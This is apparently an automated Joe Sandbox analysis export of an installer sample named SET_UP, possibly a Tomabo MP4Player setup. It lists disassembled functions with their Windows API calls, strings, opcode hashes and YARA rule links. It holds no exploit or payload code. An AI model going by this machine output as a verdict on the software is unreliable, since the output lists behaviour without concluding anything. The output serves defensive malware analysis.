                                                                                                                                                                                                  • Opcode ID: 6a3c10639678ce6cabcfd295ee8d220f5186da441b4f9672c96504a596d16502
                                                                                                                                                                                                  • Instruction ID: fbc3b05537a244330e7ecc86cf21687a35f9a1615d03bdc1d77b193306773529
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a3c10639678ce6cabcfd295ee8d220f5186da441b4f9672c96504a596d16502
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C30184712502087EE6706772CC85F67779CEB54368F05492AB615D71E2CAB5E8004638
                                                                                                                                                                                                  Function 004C184B Relevance: 9.1, APIs: 6, Instructions: 53stringwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004C186A
                                                                                                                                                                                                  • GlobalLock.KERNEL32(?), ref: 004C1872
                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000208), ref: 004C1885
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 004C188E
                                                                                                                                                                                                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 004C18A6
                                                                                                                                                                                                  • PostMessageW.USER32(?,000003E4,?,00000000), ref: 004C18B3
                                                                                                                                                                                                    • Part of subcall function 004B57CE: IsWindowEnabled.USER32(?), ref: 004B57D8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2333435275-0
                                                                                                                                                                                                  • Opcode ID: 47dbf1eae1b9e633d2b4bb8cbd9c9fb64c144de6c5103a1664e8b533a14496cb
                                                                                                                                                                                                  • Instruction ID: bae499863c3f8554b913ab85d8b0dfe52ad19103e03a1fb064012f56d7a3e210
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47dbf1eae1b9e633d2b4bb8cbd9c9fb64c144de6c5103a1664e8b533a14496cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C901A136600108BFDB41ABA1DD49EDF7BBCEF48304F004179BA05D6161DB349E51DBA8
                                                                                                                                                                                                  Function 0041CDC4 Relevance: 9.0, APIs: 6, Instructions: 49registrystringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041CDD1
                                                                                                                                                                                                  • RegSetValueW.ADVAPI32(?,?,00000001,?,00000000), ref: 0041CDE5
                                                                                                                                                                                                  • RegCreateKeyW.ADVAPI32(?,?,?), ref: 0041CDFC
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041CE09
                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,?), ref: 0041CE21
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CE2C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Valuelstrlen$CloseCreate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 306239685-0
                                                                                                                                                                                                  • Opcode ID: be8254c5c1c35891994467fddd2e68db16e83aa0a65698724810a2577830e7c3
                                                                                                                                                                                                  • Instruction ID: f52f2fd6d4ddf7f545d9d2de6a35cdb1ce5d1241ed194b3747800671f149007b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: be8254c5c1c35891994467fddd2e68db16e83aa0a65698724810a2577830e7c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C014C35180219BFDF214F61DC48FEA3B69FB04751F008421FA19D9160D772D961AB98
                                                                                                                                                                                                  Function 0040CA5F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040CA64
                                                                                                                                                                                                    • Part of subcall function 0042E2D8: __EH_prolog.LIBCMT ref: 0042E2DD
                                                                                                                                                                                                    • Part of subcall function 004B6E7E: __EH_prolog.LIBCMT ref: 004B6E83
                                                                                                                                                                                                    • Part of subcall function 004B6E7E: FindResourceW.KERNEL32(?,00000000,00000005,00000001,?,00000000), ref: 004B6EBB
                                                                                                                                                                                                    • Part of subcall function 004B6E7E: LoadResource.KERNEL32(?,00000000,?,00000000), ref: 004B6EC3
                                                                                                                                                                                                    • Part of subcall function 004B6E7E: LockResource.KERNEL32(?,00000001,?,00000000), ref: 004B6ED0
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040CB9A
                                                                                                                                                                                                    • Part of subcall function 004B223F: __EH_prolog.LIBCMT ref: 004B2244
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$Resource$DecrementFindInterlockedLoadLockMessageSend
                                                                                                                                                                                                  • String ID: %s.%s%s$MP4Player$Tomabo
                                                                                                                                                                                                  • API String ID: 2862935712-2079911099
                                                                                                                                                                                                  • Opcode ID: 06002f98f3368dae9cd6956aaefcd24ec741cc7efaa572c827c2db947f9e70d3
                                                                                                                                                                                                  • Instruction ID: 65472e363d7491809642994be6eea904b3d60718fdcf6d9742c08e5b4544893d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06002f98f3368dae9cd6956aaefcd24ec741cc7efaa572c827c2db947f9e70d3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13515A71D00248EFDB14EBA9C985EEEBBB9AF18314F10416EF515B3291CB785E08CB65
                                                                                                                                                                                                  Function 004109DC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004109E1
                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00410A3C
                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00100000,?,?,?,00000000), ref: 00410B67
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologVersionlstrcpyn
                                                                                                                                                                                                  • String ID: @$L
                                                                                                                                                                                                  • API String ID: 2508861242-22657231
                                                                                                                                                                                                  • Opcode ID: 7d6bddc19510cfcf376fed0acf6eb0a9dce4ce5fd9d583a936a59551f656b9b7
                                                                                                                                                                                                  • Instruction ID: 1bdff2053175d015a972fd86eddf71ef168b5de8771683e98cd4c1fa2e32d5de
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d6bddc19510cfcf376fed0acf6eb0a9dce4ce5fd9d583a936a59551f656b9b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A151A1706103088FCB25AF66C945ADE7BA5BF44308F00456FE44A9B352DBBC9985CF9D
                                                                                                                                                                                                  Function 0042C594 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C652
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C66B
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C68B
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C6A8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • %X%I64X%I64X%I64X%I64X%I64X%I64X%s%s%I64X, xrefs: 0042C600
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID: %X%I64X%I64X%I64X%I64X%I64X%I64X%s%s%I64X
                                                                                                                                                                                                  • API String ID: 885266447-3030311282
                                                                                                                                                                                                  • Opcode ID: 34eed2107787deed370310be59b127d2c9faf6b4d4a6b3a0bb6e60450d7a0723
                                                                                                                                                                                                  • Instruction ID: ebcd416a4ae9bcafc0a198760b9e8d3dda98d77b0342e54f53e437e4cb277a6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34eed2107787deed370310be59b127d2c9faf6b4d4a6b3a0bb6e60450d7a0723
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E4140B2900219AEDF109FA6D8819EFBBB9FF48354F40456FE105F3240DB746A448BA9
                                                                                                                                                                                                  Function 0049CA1D Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0049CA3C
                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0049CA71
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0049CAD1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                                                                  • API String ID: 1385375860-4131005785
                                                                                                                                                                                                  • Opcode ID: 60dc34503d4cf6b98e40e444838f2bc28865fc0098d10e826fb233d56671cc9f
                                                                                                                                                                                                  • Instruction ID: 7476b738a79431dd481cd19471d76dd401d4edf445982501db1ae2d4ddd21731
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60dc34503d4cf6b98e40e444838f2bc28865fc0098d10e826fb233d56671cc9f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F83113719452486DEF31C675ACC6BEE3F689B02704F2804FBD185DA242E638AE858B1D
                                                                                                                                                                                                  Function 004B4D71 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106windowstringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000), ref: 004B4DEA
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 004B4E0E
                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 004B4E2E
                                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 004B4E4F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ItemMessageSend$ByteCharMultiWidelstrlen
                                                                                                                                                                                                  • String ID: kMK
                                                                                                                                                                                                  • API String ID: 3573766508-521819267
                                                                                                                                                                                                  • Opcode ID: a393aa5697fdccc84db3038a2c7ff2e05f2eb3815e9e3abb0e799a7967e03901
                                                                                                                                                                                                  • Instruction ID: 9d7c9fe4fcbf2c43341ef40a679ab4b6edc109693a0426c652acf7cd3373fde5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a393aa5697fdccc84db3038a2c7ff2e05f2eb3815e9e3abb0e799a7967e03901
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51319075800215AADF209B5ADC449EFBBBCFBD5320F508127F961A2295C3389A42DB39
                                                                                                                                                                                                  Function 0042CA53 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042CA58
                                                                                                                                                                                                    • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,00000001,00508FBC,00000000,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF185
                                                                                                                                                                                                    • Part of subcall function 004AF167: lstrlenW.KERNEL32(00000000,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF1D8
                                                                                                                                                                                                    • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,?,0042B3BC,?,?,?,?,?,00000000), ref: 004AF1A2
                                                                                                                                                                                                    • Part of subcall function 004AF167: lstrlenW.KERNEL32(?,?,?,?,00000000,?,0042B3BC,?,?,?,?,?), ref: 004AF2B7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen$H_prolog
                                                                                                                                                                                                  • String ID: </div>$<div>$LicenseKey$Licensekey
                                                                                                                                                                                                  • API String ID: 3834905643-2803411531
                                                                                                                                                                                                  • Opcode ID: 63e86c8a0a56bd39fcef70d467b5ca27fb753f4c299b03a5d5b9dedd439c7383
                                                                                                                                                                                                  • Instruction ID: f413031fe4c484b22bd72026cf67f67ddf6e04059db6cce8078240730d945f32
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e86c8a0a56bd39fcef70d467b5ca27fb753f4c299b03a5d5b9dedd439c7383
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E314535640118BADB14EF91EC52FEE3764EF21768F50C12EB9195A0D2DF78AA08C798
                                                                                                                                                                                                  Function 0040CC86 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040CC8B
                                                                                                                                                                                                  • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040CCAC
                                                                                                                                                                                                    • Part of subcall function 004B01E6: SendMessageW.USER32(?,0000104B,00000000,?), ref: 004B021A
                                                                                                                                                                                                    • Part of subcall function 0041F066: GetModuleFileNameW.KERNEL32(?,00000000,000003FF), ref: 0041F0A2
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,?,00000000), ref: 0040CDB8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$DecrementFileH_prologInterlockedModuleName
                                                                                                                                                                                                  • String ID: %s\%s$Data\File Types
                                                                                                                                                                                                  • API String ID: 2962548239-1174472317
                                                                                                                                                                                                  • Opcode ID: decf278a1d76cd6922878d9975aae44f8cb03dbdbb5a33284ddad7796e9ba209
                                                                                                                                                                                                  • Instruction ID: e5b89edc2a78572c049701f4a7e7d00ffedea8fed11cf49f28584d29c8090744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: decf278a1d76cd6922878d9975aae44f8cb03dbdbb5a33284ddad7796e9ba209
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A419D70A00246ABCF11EBA4C946BEEBBB4AF14314F10456EF411A32D2DB789A04CBA5
                                                                                                                                                                                                  Function 00405D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405D6F
                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00405DDD
                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00405E2D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CompatibleCreate$BitmapH_prolog
                                                                                                                                                                                                  • String ID: <L
                                                                                                                                                                                                  • API String ID: 595870127-3438057367
                                                                                                                                                                                                  • Opcode ID: 03059e5edefd6bdc0b51e31d592b3767dd72731fcb13be42391047ace6846210
                                                                                                                                                                                                  • Instruction ID: af47fab676e03846496108c5720f2cf3df75dcde79d37731e01ef5976b41ed65
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03059e5edefd6bdc0b51e31d592b3767dd72731fcb13be42391047ace6846210
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E315771600A06EFCB60DF69C484A5AFBF5FF48300B148A2EE55AD7A11D738E915CFA4
